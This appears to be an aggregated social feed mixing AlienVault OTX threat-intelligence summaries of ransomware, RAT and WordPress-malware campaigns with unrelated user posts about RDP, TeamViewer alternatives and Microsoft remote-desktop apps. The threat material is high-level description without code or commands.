KongTuke FileFix Leads to New Interlock RAT Variant

A new and resilient variant of the Interlock ransomware group's remote access trojan (RAT) has been identified. This PHP-based malware, a shift from the previous JavaScript-based NodeSnake, is being used in a widespread campaign associated with the LandUpdate808 (KongTuke) web-inject threat clusters. The campaign begins with compromised websites injected with a hidden script, employing IP filtering to serve the payload. The malware performs automated reconnaissance, establishes command and control through Cloudflare Tunnels, and has various execution capabilities. It uses PowerShell for system profiling and discovery, creates persistence through registry modifications, and leverages RDP for lateral movement. The campaign appears to be opportunistic, targeting multiple industries.

Pulse ID: 687617e3e43c59ce42814c2f
Pulse Link: https://otx.alienvault.com/pulse/687617e3e43c59ce42814c2f
Pulse Author: AlienVault
Created: 2025-07-15 08:57:07

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Stealthy PHP Malware Uses ZIP Archive to Redirect WordPress Visitors

A sophisticated piece of malware was discovered embedded in a WordPress site's core files, specifically in wp-settings.php. The malware uses a ZIP archive to hide malicious code and perform search engine poisoning and unauthorized content injection. It employs dynamic Command and Control server selection, anti-bot mechanisms, and manipulates SEO-related files. The malware's main goals include manipulating search engine rankings, injecting spam content, and performing unauthorized redirects. It uses obfuscation techniques and ZIP archives for code inclusion, making it challenging to detect and remove. Prevention measures include keeping software updated, using reputable sources for themes and plugins, implementing strong credential security, utilizing a Web Application Firewall, and regularly scanning for malware.

Pulse ID: 68750b271ed247073ded7ab1
Pulse Link: https://otx.alienvault.com/pulse/68750b271ed247073ded7ab1
Pulse Author: AlienVault
Created: 2025-07-14 13:50:30

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

A Hybrid Approach with Data Exfiltration and Encryption

The BlackSuit ransomware group, believed to be a rebrand of Royal ransomware, has emerged as a significant threat to organizations. This sophisticated attack combines data exfiltration and encryption, utilizing tools like Cobalt Strike for command and control, rclone for data exfiltration, and BlackSuit ransomware for file encryption. The group's tactics include lateral movement through RDP, SMB, and PsExec, credential dumping, and deletion of shadow copies. Notably, the ransomware uses a -nomutex flag, allowing multiple concurrent executions. The attack flow involves initial access, lateral movement, data exfiltration, partial encryption, and ransom demands ranging from $1 million to $10 million USD in Bitcoin. This hybrid approach highlights the evolving nature of ransomware threats and the need for robust security measures.

Pulse ID: 687229325abbf82b9f462e99
Pulse Link: https://otx.alienvault.com/pulse/687229325abbf82b9f462e99
Pulse Author: AlienVault
Created: 2025-07-12 09:21:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Attackers Inject Code into WordPress Theme to Redirect Visitors

An analysis reveals a recent attack vector targeting WordPress themes, specifically injecting malicious code into the footer.php file. The injected code uses a function called r2048 to retrieve a URL from a remote server and redirect visitors. This method is particularly insidious as it's not visible from the WordPress dashboard. The attackers utilize either cURL or file_get_contents to fetch the redirection URL, allowing for dynamic control over the destination based on factors like the user's browser or device. This technique underscores the importance of regular theme and plugin audits, as well as securing FTP and SSH access to prevent unauthorized file modifications.

Pulse ID: 6870b25f2615d0a0d9852b01
Pulse Link: https://otx.alienvault.com/pulse/6870b25f2615d0a0d9852b01
Pulse Author: AlienVault
Created: 2025-07-11 06:42:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Deploying NetSupport RAT via WordPress & ClickFix

A threat actor is using compromised WordPress websites to distribute a malicious version of NetSupport Manager Remote Access Tool (RAT). The attack chain involves phishing campaigns, website compromise, DOM manipulation, and a fake CAPTCHA page. The malware is delivered through a batch file that downloads and executes NetSupport Client files. Post-infection, the attacker uses NetSupport's features for reconnaissance and further exploitation. The attack utilizes various JavaScript files and DOM manipulation techniques to evade detection. Multiple IP addresses and domains associated with the attack infrastructure have been identified, primarily linked to hosting providers in Moldova.

Pulse ID: 6870355e6a5f2386068698a0
Pulse Link: https://otx.alienvault.com/pulse/6870355e6a5f2386068698a0
Pulse Author: AlienVault
Created: 2025-07-10 21:49:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Malicious NetSupport Campaign Exploits WordPress Sites and User Clipboard

Pulse ID: 686c8a881b3707894eedd2b0
Pulse Link: https://otx.alienvault.com/pulse/686c8a881b3707894eedd2b0
Pulse Author: cryptocti
Created: 2025-07-08 03:03:35

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Need to reboot a server but want to pick up right where you left off?  No problem — just head to Settings (macOS) or Options (Windows), find the “Behavior” section, and enable the setting 

Random #WindowsXP tip: if you're connecting to your desktop via #RDP and the regular mouse cursor doesn't appear (but others, like the wait and resize cursors, do), make sure you're using the default cursor theme. Some alternate themes or custom cursors may cause problems with RDP.

Hide Your RDP: Password Spray Leads to RansomHub Deployment

This report details a cyberattack where threat actors gained initial access through a password spray attack on an exposed RDP server. They used Mimikatz and Nirsoft for credential harvesting, and employed living-off-the-land techniques along with tools like Advanced IP Scanner for network discovery. The attackers utilized Rclone for data exfiltration via SFTP and deployed RansomHub ransomware across the network using SMB and remote services. The intrusion lasted six days, culminating in widespread encryption and ransom demands. Key phases included initial access, lateral movement, credential theft, data exfiltration, and ransomware deployment, demonstrating a sophisticated and multi-staged attack methodology.

Pulse ID: 6862dc349ae605bef0998ced
Pulse Link: https://otx.alienvault.com/pulse/6862dc349ae605bef0998ced
Pulse Author: AlienVault
Created: 2025-06-30 18:49:24

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

RansomHub’s Use of Mimikatz and Network Scanners in RDP Based Attacks

Pulse ID: 68635069d90cca3f1a2b9ff7
Pulse Link: https://otx.alienvault.com/pulse/68635069d90cca3f1a2b9ff7
Pulse Author: cryptocti
Created: 2025-07-01 03:05:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Fake WordPress Plugin Use To Stealing Credit Cards and Steals Credentials

A stealthy and powerful malware cleverly hiding inside a fake WordPress plugin. This dangerous malware can steal credit card details

Pulse ID: 68618d7efaf70a58dd91c43a
Pulse Link: https://otx.alienvault.com/pulse/68618d7efaf70a58dd91c43a
Pulse Author: cryptocti
Created: 2025-06-29 19:01:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Black Hat SEO Poisoning Search Engine Results For AI to Distribute Malware

Threat actors are exploiting the popularity of AI tools by using Black Hat SEO techniques to poison search engine rankings for AI-related keywords. These malicious websites redirect users through multiple layers to deliver malware such as Vidar, Lumma, and Legion Loader. The attackers employ sophisticated JavaScript to collect browser data, perform fingerprinting, and evade detection. The malware payloads are often packaged in large installer files to bypass sandboxes. The campaign uses trusted platforms like WordPress and AWS CloudFront to appear legitimate. Victims are lured through high-ranking search results for AI topics, leading to infection chains involving stealer malware and cryptocurrency-stealing browser extensions.

Pulse ID: 685d8317b97608a23bed71ee
Pulse Link: https://otx.alienvault.com/pulse/685d8317b97608a23bed71ee
Pulse Author: AlienVault
Created: 2025-06-26 17:27:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

With USB/IP, I can now use my YubiKey remotely via SSH in the same way as I was sitting in front of my machine. Both in early boot stage (initrd); unlocking LUKS encrypted filesystem, and in booted system stage; signing git commits and authenticate to GitHub. Great! But what about using FIDO2/WebAuthn via RDP to log in to web services? USB redirection is not supported for xrdp. Is there any workarounds coming up to for example redirect WebAuthn from one machine to another?

Seriously, if I was #LinusSebastian of #LinusTechTips I'd literally choose to #donate the cost of a #TeamViewer #subscription to #FLOSS #RemoteDesktop projects like #Dayon instead and sue TeamViewer into upholding their contract or a full refund with interest as if it was a loan because clearly they chose violate that contract on their own terms and initiative!

https://www.youtube.com/watch?v=RT1t1JlZugM&t=140

And yes, Dayon! is awesome and I can fully recommend this as an alternative to TeamViewer, #AnyDesk, etc.

https://retgal.github.io/Dayon/

• For any system that needs Remote Access as unattended I'd recommend to setup a #VPN or at least a Reverse-#SSH connection anyway so one can launch something like Dayon! by just sending a single command and have #RemoteDesktop access on-demand.

So yeah, TeamViewer literally shot themselves in the foot here by deciding to shaft paying customers who were able and willing to pay the absurd prices you asked for for a one-time license.

• Also whilst TeamViewer does OFC maintain some infrastructure, most what they do is basically run a "rendrevous"-Server to allow two endpoints behind NATs to connect to each other and exchange details to make UPnP-style hole-punching work.

That's traffic in the single-digit megabytes per year and client, as there's not much between as clients pinging their server and basically boing some simple handshakes.

• And as Linus said it's not his problem if they gotta have to keep systems up and running in perpetuity. They offered that deal and now they have to suffer through it! By paying the obligations are on to TeamViewer to make it work and continue to make it work!

Also if I'm on a #LAN why would I want to use TeamViewer and not any #VNC (or god forbid #RDP) server? THE WHOLE POINT OF USING TeamViewer, AnyDesk, etc. IS TO NOT HAVE TO WORRY ABOUT NATs, FIREWALLS AND IP-ADDRESSES AND JUST GET CONNECTED FFS!!!

• Personally I use #Remmina and Dayon, but that's because Remmina is comfortable even for SSH and can do that as well as RDP & VNC and Dayon is just the simple option I can walktrough people that need #TechSupport #remote|ly for a quick hands-on...

Definitely my recommendation because it also allows for any use-cases and doesn't nag one to "buy a license!"

• So please someone please let #Linus know about Dayon so he can do a "TeamViewer alternatives" video...

Analysis of a Malicious WordPress Plugin: The Covert Redirector

A malicious WordPress plugin named 'wordpress-player.php' has been discovered, affecting at least 26 websites. The plugin injects a hidden HTML5 video player and establishes a WebSocket connection to a command and control server. It redirects visitors to suspicious websites after 4-5 seconds, avoiding execution for logged-in users. The malware uses a fake 'WordPress Core' author name to evade detection. It impacts website integrity through unauthorized redirects, SEO degradation, and potential security risks to visitors. Mitigation steps include thorough scanning, malware removal, credential resets, software updates, and implementing a Web Application Firewall.

Pulse ID: 68536e4f88b62f5f7d8c4865
Pulse Link: https://otx.alienvault.com/pulse/68536e4f88b62f5f7d8c4865
Pulse Author: AlienVault
Created: 2025-06-19 01:56:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

4 Steps to Easily Access #RDP Remote Desktop with #Windows #VPS

Read this guide, "4 Steps to Easily Access RDP Remote Desktop with Windows VPS" to connect your Windows VPS to RDP (remote desktop protocol). RDP technology also fulfills other IT needs. For example, some computers, such as rack-mounted servers in data centers, don't have input ...
Continued https://blog.radwebhosting.com/4-steps-to-easily-access-rdp-remote-desktop-with-windows-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.raddemo.host #windowsserver #vpsservers #remotedesktopprotocol #vpsguide #microsoftremotedesktop #vpsplatform #rdpserver

Microsoft: We insist that you sign onto your personal Windows PC with an online Microsoft account.

Also Microsoft: Windows App Mobile has replaced Remote Desktop Mobile, and no longer supports signing onto your personal Windows PC with an online Microsoft account.

#Microsoft #RemoteDesktop #RDP

Global Organizations Targeted in Alleged Access Sale https://dailydarkweb.net/global-organizations-targeted-in-alleged-access-sale/ #UnauthorizedAccesses #CyberSecurity #networkaccess #PulseSecure #threatactor #databreach #government #darkweb #CISCO #RDP #VPN

So, when #RDP's login window includes that "remember me" check-box, I'm reminded of #Futurama.